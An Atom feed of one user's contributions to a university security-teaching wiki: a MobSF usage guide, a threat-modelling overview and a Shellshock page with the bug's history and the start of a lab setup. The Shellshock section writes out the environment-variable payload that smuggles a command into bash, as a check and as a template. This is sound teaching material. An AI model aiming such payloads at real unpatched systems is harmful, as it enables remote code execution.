<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bnagl</id>
	<title>Elvis Wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://elvis.hcw.ac.at/wiki/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Bnagl"/>
	<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php/Special:Contributions/Bnagl"/>
	<updated>2026-09-10T19:12:50Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.41.5</generator>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Mobile-Security-Framework-MobSF&amp;diff=11099</id>
		<title>Mobile-Security-Framework-MobSF</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Mobile-Security-Framework-MobSF&amp;diff=11099"/>
		<updated>2023-01-13T16:34:03Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:MobSF Logo.png|450px|thumb|right|Mobile-Security-Framework]]&lt;br /&gt;
== Summary == &lt;br /&gt;
Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Follow the [[Install Mobile-Security-Framework-MobSF]] guide for static analysis.&lt;br /&gt;
&lt;br /&gt;
* Optional: Follow the [[Install Genymotion]] guide for dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1: Open the Webpage  ===&lt;br /&gt;
&lt;br /&gt;
http://localhost:8000&lt;br /&gt;
&lt;br /&gt;
[[File:MobSF_startpage.PNG|1200px]]&lt;br /&gt;
&lt;br /&gt;
=== Step 2: Upload Mobile Application  ===&lt;br /&gt;
Select the upload button. This could take a while, because MobSF will decompile the apk and analyze all the files and dependencies.&lt;br /&gt;
&lt;br /&gt;
=== Step 3: Static Analysis ===&lt;br /&gt;
After uploading our Mobile Application the Report will be generated and we can see the resulting information.&lt;br /&gt;
On the starting page we can see a general overview about the results:&lt;br /&gt;
[[File:modsf_Static_1.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
If MobSF finds CWE&#039;s during the code analysis, the results will be shown like this:&lt;br /&gt;
[[File:modsf_Static_2.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
MobSF also gives the user the opportunity to compare different apks.&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Static_3.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Static_4.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Static_5.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
=== Optional Step 4: Dynamic Analysis ===&lt;br /&gt;
If the dynamic analysis is started, a emulation of the app will be started and it is possible to monitor the behaviour and possibly load some Java scripts.&lt;br /&gt;
[[File:modsf_Dynamic_1.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Dynamic_2.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Dynamic_3.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Dynamic_4.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* Sichere Softwareentwicklung (IT-Security 22/23)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Mobile-Security-Framework-MobSF&amp;diff=11064</id>
		<title>Mobile-Security-Framework-MobSF</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Mobile-Security-Framework-MobSF&amp;diff=11064"/>
		<updated>2023-01-13T13:05:56Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Added/removed some content.&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[File:MobSF Logo.png|450px|thumb|right|Mobile-Security-Framework]]&lt;br /&gt;
== Summary == &lt;br /&gt;
Mobile Security Framework (MobSF) is an automated, all-in-one mobile application (Android/iOS/Windows) pen-testing, malware analysis and security assessment framework capable of performing static and dynamic analysis. The Dynamic Analyzer helps you to perform runtime security assessment and interactive instrumented testing.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Follow the [[Install Mobile-Security-Framework-MobSF]] guide for static analysis.&lt;br /&gt;
&lt;br /&gt;
* Optional: Follow the [[Install Genymotion]] guide for dynamic analysis.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1: Open the Webpage  ===&lt;br /&gt;
&lt;br /&gt;
http://localhost:8000&lt;br /&gt;
&lt;br /&gt;
[[File:MobSF_startpage.PNG|1200px]]&lt;br /&gt;
&lt;br /&gt;
=== Step 2: Upload Mobile Application  ===&lt;br /&gt;
Select the upload button. This could take a while, because MobSF will decompile the apk and analyze all the files and dependencies.&lt;br /&gt;
&lt;br /&gt;
=== Step 3: Static Analysis ===&lt;br /&gt;
After uploading our Mobile Application the Report will be generated and we can see the resulting information.&lt;br /&gt;
On the starting page we can see a general overview about the results:&lt;br /&gt;
[[File:modsf_Static_1.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
If MobSF finds CWE&#039;s during the code analysis, the results will be shown like this:&lt;br /&gt;
[[File:modsf_Static_2.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
MobSF also gives the user the opportunity to compare different apks.&lt;br /&gt;
[[File:modsf_Static_3.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Static_4.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Static_5.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
=== Optional Step 4: Dynamic Analysis ===&lt;br /&gt;
If the dynamic analysis is started, a emulation of the app will be started and it is possible to monitor the behaviour and possibly load some Java scripts.&lt;br /&gt;
[[File:modsf_Dynamic_1.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Dynamic_2.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Dynamic_3.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[File:modsf_Dynamic_4.png|1200px]]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* Sichere Softwareentwicklung (IT-Security 22/23)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=File:MobSF_startpage.PNG&amp;diff=11063</id>
		<title>File:MobSF startpage.PNG</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=File:MobSF_startpage.PNG&amp;diff=11063"/>
		<updated>2023-01-13T12:58:58Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=PandwaRF&amp;diff=9730</id>
		<title>PandwaRF</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=PandwaRF&amp;diff=9730"/>
		<updated>2022-01-30T21:53:27Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Changed template to default template&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
Description what this documentation is about.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Ubuntu 18.04 bionic amd64&lt;br /&gt;
* Packages: git emacs&lt;br /&gt;
&lt;br /&gt;
In order to complete these steps, you must have followed [[Some Other Documentation]] before.&lt;br /&gt;
&lt;br /&gt;
== Description ==&lt;br /&gt;
&lt;br /&gt;
=== Step 1 ===&lt;br /&gt;
&lt;br /&gt;
Enter these commands in the shell&lt;br /&gt;
&lt;br /&gt;
 echo foo&lt;br /&gt;
 echo bar&lt;br /&gt;
&lt;br /&gt;
=== Step 2 ===&lt;br /&gt;
&lt;br /&gt;
Make sure to read&lt;br /&gt;
&lt;br /&gt;
* War and Peace&lt;br /&gt;
* Lord of the Rings&lt;br /&gt;
* The Baroque Cycle&lt;br /&gt;
&lt;br /&gt;
== Used Hardware ==&lt;br /&gt;
&lt;br /&gt;
[[Device to be used with this documentation]]&lt;br /&gt;
[[Maybe another device to be used with this documentation]]&lt;br /&gt;
&lt;br /&gt;
== Courses ==&lt;br /&gt;
&lt;br /&gt;
* [[A course where this documentation was used]] (2017, 2018)&lt;br /&gt;
* [[Another one]] (2018)&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://wikipedia.org&lt;br /&gt;
* https://google.com&lt;br /&gt;
&lt;br /&gt;
[[Category:Documentation]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Threat_Modelling&amp;diff=9711</id>
		<title>Threat Modelling</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Threat_Modelling&amp;diff=9711"/>
		<updated>2022-01-30T14:20:39Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: Changed a typo&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
Threat modelling is a process used to systematically identify potential threats to products, applications or any other system. It helps to figure out the possible vulnerabilities of a system that are most desired by attackers. There is hardly any product which who threat modeling can´t be used. It helps with the security of software, applications, networks, IoT, business processes and many more. &lt;br /&gt;
&lt;br /&gt;
The reasons to use threat modeling are mainly to build secure design and to document threats and mitigations. It helps to identify threats and compliance requirements and to evaluate their risks to the system as well as is helps to efficient invest given resources. An important part is to document the threats and mitigations found. &lt;br /&gt;
&lt;br /&gt;
The methodology mostly always includes a description, design or model of the potential problem, a list of assumptions that can be checked or challenged and of potential threats, a list of actions to be taken against this threats and a way of validating the output and the action taken. &lt;br /&gt;
&lt;br /&gt;
== When to perform == &lt;br /&gt;
&lt;br /&gt;
It is never to late to perform Threat Modelling actions but the earlier the better. It is to consider that, if the systems architecture isn´t changing, there are no new processes or dataflows and no changes to the data structure than it is unlikely that there will be new threats that are to be considered. But if some of them change, it is useful to examine what could go wrong in the current change. If something has already happened, it is important to have a look again at the system and check the threat models to find out what was going wrong and what was left out. &lt;br /&gt;
&lt;br /&gt;
== The four questions == &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What are we building?&#039;&#039;&#039;&lt;br /&gt;
This includes the scope of the Threat Model and requires an understanding of the subject to be tested. For that purpose, it can help to have a look at or make yourself a architecture diagram, dataflow transitions or data classifications. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What can go wrong?&#039;&#039;&#039;&lt;br /&gt;
Manly the research activity to find the main threats that appear to the system or the application. It helps to use a structure to think it through or to brainstorm about the possibilities.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;What are we going to do about it?&#039;&#039;&#039; &lt;br /&gt;
Turn the findings to action using the most fitted method. &lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Did we a good enough job?&#039;&#039;&#039; &lt;br /&gt;
Check the quality, feasibility, progress and the planning of the process you developed. If not satisfied, start everything again with a better concept. &lt;br /&gt;
&lt;br /&gt;
== Methodologies == &lt;br /&gt;
&lt;br /&gt;
=== STRIDE ===&lt;br /&gt;
&lt;br /&gt;
STRIDE is the threat modeling methodology from Microsoft that aligns with their Trustworthy Computing directive of January 2002. It mainly helps Microsoft Windows software developers assure the security during the design phase. &lt;br /&gt;
The goal is that the application meets the CIA (Confidentiality, Integrity and Availability) security properties and as well Authorization, Authentication and Non-Repudiation. The six threat categories are:&lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Spoofing identity:&#039;&#039;&#039; assuming or taking on the identity of another person to accomplish a certain goal. &lt;br /&gt;
&#039;&#039;Example: Using another person’s username and password to login.&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Tampering with data:&#039;&#039;&#039; The malicious modification of data. &lt;br /&gt;
&#039;&#039;Example: The unauthorized changes to persistent data and alteration of data in a dataflow.&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Repudiation:&#039;&#039;&#039; Users who deny performing an action without other parties having any way to prove otherwise. &lt;br /&gt;
&#039;&#039;Example: An illegal action of a user in a system without the possibility to trace the operation.&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Information disclosure:&#039;&#039;&#039; The exposure of information to unauthorized individuals. &lt;br /&gt;
&#039;&#039;Example: If a user can read files, he should not have access to or if an attacker can read transit between computers where he is not supposed to.&#039;&#039; &lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Denial of service:&#039;&#039;&#039; A DoS attack denies service to a valid user. &lt;br /&gt;
&#039;&#039;Example: Making a Webserver unavailable by creating a lot of fake requests.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
*&#039;&#039;&#039;Elevation of privilege:&#039;&#039;&#039; An unprivileged user gains enough privileged access to destroy the entire system. &lt;br /&gt;
&#039;&#039;Example: An Attacker has effectively penetrated system defense to the point where he becomes part of the trusted system.&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
=== OCTAVE ===&lt;br /&gt;
&lt;br /&gt;
OCTAVE stand for “Operationally Critical Threat, Asset and Vulnerability Evaluation and is developed at the Carnegie Mellon University´s Software Engineering Institute (SEI) and is heavy weighted on assessing organizational risks that result from data asset breaches. It was one of the first specifically for cybersecurity developed threat modeling methods. &lt;br /&gt;
Since it is mostly used in companies, it is normally performed in small teams composed of people from the business unit as well as from the IT department to address the security needs. It is driven by the operational risks more than by the theology risks and allows an organization to direct and manage information security risk assessments, communicate key security information as well as focus on protecting key information and to find the best practice and decisions based on the unique risk of their department and thus provides a highly customizable security option.&lt;br /&gt;
&lt;br /&gt;
There are eight processes that are broken in three (or four with phase 0) phases:&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Phase 0:&#039;&#039;&#039; Exploratory phase that determine criteria used.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Phase 1:&#039;&#039;&#039; Develop initial security strategies&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Phase 2:&#039;&#039;&#039; Technological view to identify infrastructure vulnerabilities&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Phase 3:&#039;&#039;&#039; Risk analysis to develop security strategy and plans&lt;br /&gt;
&lt;br /&gt;
=== Trike ===&lt;br /&gt;
&lt;br /&gt;
The Trike Threat Modeling is an open source process that provides a risk-based approach and risk modeling processes. It is based on a requirement model which ensures that the assigned levels of risk are acceptable to the stakeholders. This means that the modeling process is focused on satisfying the security auditing process from a cyber management perspective.&lt;br /&gt;
There are two attack types in the Trike model, an elevation of privilege attack or a denial of service attack and the actions taken are divided into one of four groups called CRUD: &#039;&#039;Create, Read, Update, Delete&#039;&#039;. The threats are rated in a rating chart that shows the risk of either attack type to a five-point scale for each CRUD action. &lt;br /&gt;
Trike starts with the creation of a requirements model and continues with the creation of a DFD, a Data Flow Diagram. From this point on the risk values are assigned to the threats and an attack graph is created. The Trike model requires a view of the entire system, therefore it can be hard to scale it for larger systems.&lt;br /&gt;
&lt;br /&gt;
=== P.A.S.T.A. ===&lt;br /&gt;
&lt;br /&gt;
The P.A.S.T.A. methodology is a new application threat modeling methodology and stands for Process for Attack Simulation and Threat Analysis. It works with a seven step process:&lt;br /&gt;
*&#039;&#039;&#039;Define business and security objectives&#039;&#039;&#039;&lt;br /&gt;
*&#039;&#039;&#039;Define the technical scope&#039;&#039;&#039;&lt;br /&gt;
*&#039;&#039;&#039;Decompose the application&#039;&#039;&#039;&lt;br /&gt;
*&#039;&#039;&#039;Threat analysis&#039;&#039;&#039;&lt;br /&gt;
*&#039;&#039;&#039;Weakness and Vulnerabilities Analysis&#039;&#039;&#039;&lt;br /&gt;
*&#039;&#039;&#039;Attacks/Exploits Enumeration and modeling&#039;&#039;&#039;&lt;br /&gt;
*&#039;&#039;&#039;Risk and impact analysis&#039;&#039;&#039;&lt;br /&gt;
The steps combine an attacker centric perspective with risk and impact analysis. It combines the business impact, application risk, trust boundaries amongst application components, correlated threats and attack patterns.&lt;br /&gt;
&lt;br /&gt;
== OWASP Tools == &lt;br /&gt;
&lt;br /&gt;
The Open Web Application Security Project is a NGO whose aim is to improve the security of software. Their main focus are applications within the World Wide Web, to enable organizations to conceive, develop, acquire, operate, and maintain applications that can be trusted. The programm includes: &lt;br /&gt;
&lt;br /&gt;
* Community-led open source software projects&lt;br /&gt;
* Over 275 local chapters worldwide&lt;br /&gt;
* Tens of thousands of members&lt;br /&gt;
* Industry-leading educational and training conferences&lt;br /&gt;
&lt;br /&gt;
OWASP Projects split in two main categories: Development- and Documentationprojects. The documentation project currently consists of:&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039;OWASP ASVS:&#039;&#039;&#039; threat modeling standard to verify applications&lt;br /&gt;
* &#039;&#039;&#039;The Guide:&#039;&#039;&#039; Guidelines for implementing secure webapplications&lt;br /&gt;
* &#039;&#039;&#039;Top Ten Most DotNet:&#039;&#039;&#039; Toolkit to improve .net security&lt;br /&gt;
* &#039;&#039;&#039;Enigform:&#039;&#039;&#039; Testplatform for OpenPGP-related webprojects&lt;br /&gt;
* &#039;&#039;&#039;ESAPI:&#039;&#039;&#039; Free and public methods to secure webapplications&lt;br /&gt;
* &#039;&#039;&#039;AntiSamy:&#039;&#039;&#039; Tool to validate user input in webapplications &lt;br /&gt;
* &#039;&#039;&#039;XSSer:&#039;&#039;&#039; Automatic system to detect Cross-Site-Scripting vulnerabilities&lt;br /&gt;
* &#039;&#039;&#039;Webgoat:&#039;&#039;&#039; Dummy webapplication (e.g. how not to do it)&lt;br /&gt;
* &#039;&#039;&#039;WebScarab:&#039;&#039;&#039; Transparent Webproxy &lt;br /&gt;
* &#039;&#039;&#039;Mantra Security Workframe:&#039;&#039;&#039; Pentesting Toolkit based on Mozilla Firefox&lt;br /&gt;
* &#039;&#039;&#039;OWASP Threat Dragon:&#039;&#039;&#039; Tool to create threat model diagrams &lt;br /&gt;
&lt;br /&gt;
=== Top 10 Web Application Security Risks ===&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a standard awareness document for developers and web application security.&lt;br /&gt;
&lt;br /&gt;
* &#039;&#039;&#039; Injection &#039;&#039;&#039;: SQL, OS or LDAP injection occur when untrusted data is sent to an interpreter. It is possible ot trick the interpreter into executing malicious code.&lt;br /&gt;
&#039;&#039;How to prevent: Usage of safe API&#039;s, Whitelists or escaping spezial characters&lt;br /&gt;
* &#039;&#039;&#039; Broken authentication &#039;&#039;&#039;: Authentication and session management is often poorly implemented, leading to compromised passwords, keys or session tokens. &lt;br /&gt;
&#039;&#039;How to prevent: Multifactor authentication, no default credentials, weak-password checks, usage of service-side and secure session managers &lt;br /&gt;
* &#039;&#039;&#039; Sensitive Data Exposure &#039;&#039;&#039;: Many Applications and APIs do not protect sensitive data, leading to credit card fraud, identify theft or other crimes.&lt;br /&gt;
&#039;&#039;How to prevent: Identify and protect data processing of sensitive data, encryption with secure cipher suites or hash functions, disable caching for sensitive data&lt;br /&gt;
* &#039;&#039;&#039; XML Enternal Entities &#039;&#039;&#039;: Poorly configured XML processors evalute external entity references.&lt;br /&gt;
&#039;&#039;How to prevent: Use complex data formats such as JSON, Upgrade old XML processors, use whitelisting or disable XML external entity and DTD processing&lt;br /&gt;
* &#039;&#039;&#039; Broken Access Control &#039;&#039;&#039;: Poor restrictions on what authenticated users are allowed to do within an application.&lt;br /&gt;
&#039;&#039;How to prevent: Log access control failures and create admin alerts, rate limit APIs, Deny everything by default, implement access controll mechanisms once and use it throughout the application&lt;br /&gt;
* &#039;&#039;&#039; Security Misconfiguration &#039;&#039;&#039;: Most commonly issue. Result of default or incomplete configurations like web- or ftp services. &lt;br /&gt;
&#039;&#039;How to prevent: Minimal plattform - only use what you really need on public systems, review and audit application configurations, use diffrent credentials &lt;br /&gt;
* &#039;&#039;&#039; Cross-Site Scripting&#039;&#039;&#039;: Occur whenever an application includes untrusted data without proper validation, leading to defaced websites, redirection to malicious sites or complete hijacking of user sessions.&lt;br /&gt;
&#039;&#039;How to prevent: Use frameworks which escape XSS like React JS, Escaping untrusted HTTP requests, applying context-sensitive encoding&lt;br /&gt;
* &#039;&#039;&#039; Insecure Deserialization &#039;&#039;&#039;: Leads to remote code execution, replay and injection attacks or user privilege escalation&lt;br /&gt;
&#039;&#039;How to prevent: Implementing integrity checks, Isolating and running code in low privilege environments, log and monitor deserialization failures and exceptions&lt;br /&gt;
* &#039;&#039;&#039; Using Components with Known Vulnerabilities &#039;&#039;&#039;: Libraries, frameworks or other software modules may undermine application defenses and enable various attacks and impacts.&lt;br /&gt;
&#039;&#039;How to prevent: Usage of minimal plattforms, remove unused dependencies, features and components. Only obtain components from official sources over secure links - also check their hashes. Patch regularly.&lt;br /&gt;
* &#039;&#039;&#039; Insufficient Logging &amp;amp; Monitoring &#039;&#039;&#039;: Allows attackers to silently operate within hijacked networks or applications. &lt;br /&gt;
&#039;&#039;How to prevent: Log and inform admins about access control failures, use centralized log management solutions, establish an incident response and recovery plan&lt;br /&gt;
&lt;br /&gt;
=== OWASP Threat Dragon === &lt;br /&gt;
&lt;br /&gt;
[[File:Owaspthreatdragon1.PNG|thumbnail|upright]]&lt;br /&gt;
&lt;br /&gt;
Threat Dragon is a free and open-source threat modeling application which is available on multiple plattforms including linux and windows. The application can also be used as a web platform. Threat Dragon is capable of: &lt;br /&gt;
&lt;br /&gt;
* designing data flow diagrams&lt;br /&gt;
* automatic determining and ranking threats&lt;br /&gt;
* suggests mitigations&lt;br /&gt;
* entry of mitigations and counter measures&lt;br /&gt;
&lt;br /&gt;
To install it on windows proceed as follows:&lt;br /&gt;
&lt;br /&gt;
* Download and install node.js latest lts version: https://nodejs.org/en/download/&lt;br /&gt;
* Download and install git for windows: https://gitforwindows.org/&lt;br /&gt;
&lt;br /&gt;
Open a powershell (with administrator privileges) and run:&lt;br /&gt;
&lt;br /&gt;
 cd C:\&lt;br /&gt;
 git clone https://github.com/mike-goodwin/owasp-threat-dragon-desktop&lt;br /&gt;
 cd .\owasp-threat-dragon-desktop\&lt;br /&gt;
 npm install&lt;br /&gt;
&lt;br /&gt;
To start the application run:&lt;br /&gt;
&lt;br /&gt;
 npm run start&lt;br /&gt;
&lt;br /&gt;
To get familiar with the threat modeling process with Threat Dragon you can open a Demo Model and start to edit it:&lt;br /&gt;
&lt;br /&gt;
[[File:Owaspthreatdragon2.PNG]]&lt;br /&gt;
&lt;br /&gt;
== References ==&lt;br /&gt;
&lt;br /&gt;
* https://owasp.org&lt;br /&gt;
* https://github.com/mike-goodwin/owasp-threat-dragon-desktop&lt;br /&gt;
* https://threatmodeler.com/threat-modeling-methodologies-overview-for-your-business/&lt;br /&gt;
* https://docs.microsoft.com/en-us/previous-versions/commerce-server/ee823878(v=cs.20)?redirectedfrom=MSDN&lt;br /&gt;
* https://technology.ku.edu/octave-method-security-assessment&lt;br /&gt;
* Introducing OCTAVE Allegro:Improving the Information Security Risk Assessment Process&amp;quot;; Richard A. Caralli&lt;br /&gt;
*&amp;quot;Real World Threat Modeling Using the PASTA Methodology&amp;quot;; Tony Uceda Valez&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
[[Category:Basic]]&lt;/div&gt;</summary>
		<author><name>Bnagl</name></author>
	</entry>
	<entry>
		<id>https://elvis.hcw.ac.at/wiki/index.php?title=Shellshock&amp;diff=9131</id>
		<title>Shellshock</title>
		<link rel="alternate" type="text/html" href="https://elvis.hcw.ac.at/wiki/index.php?title=Shellshock&amp;diff=9131"/>
		<updated>2022-01-04T16:13:52Z</updated>

		<summary type="html">&lt;p&gt;Bnagl: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Summary == &lt;br /&gt;
&lt;br /&gt;
This documentation is about the Shellshock bug found in 2014.&lt;br /&gt;
&lt;br /&gt;
== Requirements ==&lt;br /&gt;
&lt;br /&gt;
* Operating system: Seed Ubuntu 12.04, Ubuntu 20.04&lt;br /&gt;
* Packages: dnsmasq&lt;br /&gt;
&lt;br /&gt;
== History ==&lt;br /&gt;
&lt;br /&gt;
=== Initial Discovery ===&lt;br /&gt;
&lt;br /&gt;
On August the 5th, 1989 a bug was accidentally introduced into the development version of bash by the then-lead developer Brian Fox. A bug that was later released within the version 1.03 of bash and existed 25 years with presumable nobody noticing. On the 24th of September 2014 an exploit which was later named Shellshock was publicly disclosed  and assigned the CVE identifier CVE-2014-6271, CVE-2014-6277 and CVE-2014-6278. The exploit was originally found by Stéphane Chazelas on the 12th of September 2014, an french software developer that contributes to the UNIX and Free Software/OpenSource community in his spare time. He originally called the exploit Bashdoor but this name did not catch on. He reported the bug to the lead developer of bash Chet Ramey, which developed a fix for it, which was rolled out by major distributors such as Debian, Red Hat and Ubuntu as part of an coordinated disclosure.&lt;br /&gt;
&lt;br /&gt;
=== Discovery of a bigger problem ===&lt;br /&gt;
&lt;br /&gt;
After fixing the initial bug, security researchers noticed that the bash shell was still parsing every environment variable that began with the sequence &amp;quot;() \{&amp;quot;. As long as the bash would parse untrusted data, it could lead to a security exploit. The focus of the researches and developers shifted their attention towards the bash parser, although they never thought that the bash parser was security-relevant. On September the 24th, 2014 a security researcher named Tavis Ormandy reported and published an example of a bug in the bash parser, that could be exploited. Because of the failed fix of the previous exploits a new CVE identifier was assigned namely CVE-2014-7169. Just one day after this, a new exploit was found by Florian Weimer, it was assigned the identifier CVE-2014-7186 and it described a Denial of Service exploit which could be executed with the use of the initial Shellshock exploit.&lt;br /&gt;
&lt;br /&gt;
=== Aftermath ===&lt;br /&gt;
&lt;br /&gt;
The impact of this exploit was enormous, basically most Unix-like systems use the bash shell, not only Linux also some distributions of BSD, Apple MacOS X and Cygwin. A big problem was that the first patch didn&#039;t fix the exploit in its entirety, the vulnerability and proof of concept of the exploit was known to the public.&lt;br /&gt;
&lt;br /&gt;
== Functionality ==&lt;br /&gt;
&lt;br /&gt;
The  Shellshock  vulnerability  is  enumerated  as  an  improper  neutralization  of  specialelements used in an OS Command (’OS Command Injection’) by the National Instituteof  Standards  and  Technology.   It  can  be  exploited  to  give  an  attacker  remote  codeexecution.  The vulnerability occurs when defining a environment variable.  So basicallyevery system where an attacker could control the content of an environment variablewas exploitable.  This included many CGI web applications that were invoked via bash,sshd using ForceCommand and DHCP clients connecting to subverted DHCP servers.&lt;br /&gt;
&lt;br /&gt;
With  the  export  command,  it  is  possible  to  export  shell  variables  but  also  shellfunctions.  In the bash version with the Shellshock vulnerability a function definitionstarted  with  ”(){”  in  the  value  of  the  exported  variable.   The  vulnerability  existedbecause  bash  does  not  stop  processing  after  the  function  definition,  it  continues  toparse and execute shell commands.Environment variables can be defined with the following command:&lt;br /&gt;
 env variablename=&#039;&amp;lt;value&amp;gt;&#039;&lt;br /&gt;
Now to exploit this vulnerability (CVE-2014-6271) in the initial bash version the following command could be used:&lt;br /&gt;
 env x=&#039;() {.;}; &amp;lt;exploit code&amp;gt;&#039;&lt;br /&gt;
&lt;br /&gt;
== Practical Shellshock DHCP Example ==&lt;br /&gt;
&lt;br /&gt;
=== Setup ===&lt;br /&gt;
I used VMware Workstation Pro, but you might aswell use the virtualisation tool of your choice. I downloaded a SEED Ubuntu12.04 VM (32-bit) from [https://seedsecuritylabs.org/lab_env.html this website] and the latest version of Ubuntu from [https://ubuntu.com/download/desktop the official website], if you have a lack of memory just use the server version.&lt;br /&gt;
For demonstration purposes I used two client machines, but you only need one SEED machine for the example to work. Both client machines and the server are configured to be in a virtual network. This can be done in your virtualisation tool.&lt;br /&gt;
&lt;br /&gt;
=== Check Vulnerablity ===&lt;br /&gt;
After successfully setting up the machines, we now check if the clients are vulnerable to Shellshock. To check for the Shellshock vulnerability you can use the following command:&lt;br /&gt;
 env x=&#039;() { :;}; echo shellshocked&#039; bash -c &amp;quot;&amp;quot;&lt;br /&gt;
&lt;br /&gt;
=== Install &amp;amp; Configurating DNSMASQ ===&lt;br /&gt;
First we have to install the package dnsmasq:&lt;br /&gt;
 apt-get install dnsmasq&lt;br /&gt;
&lt;br /&gt;
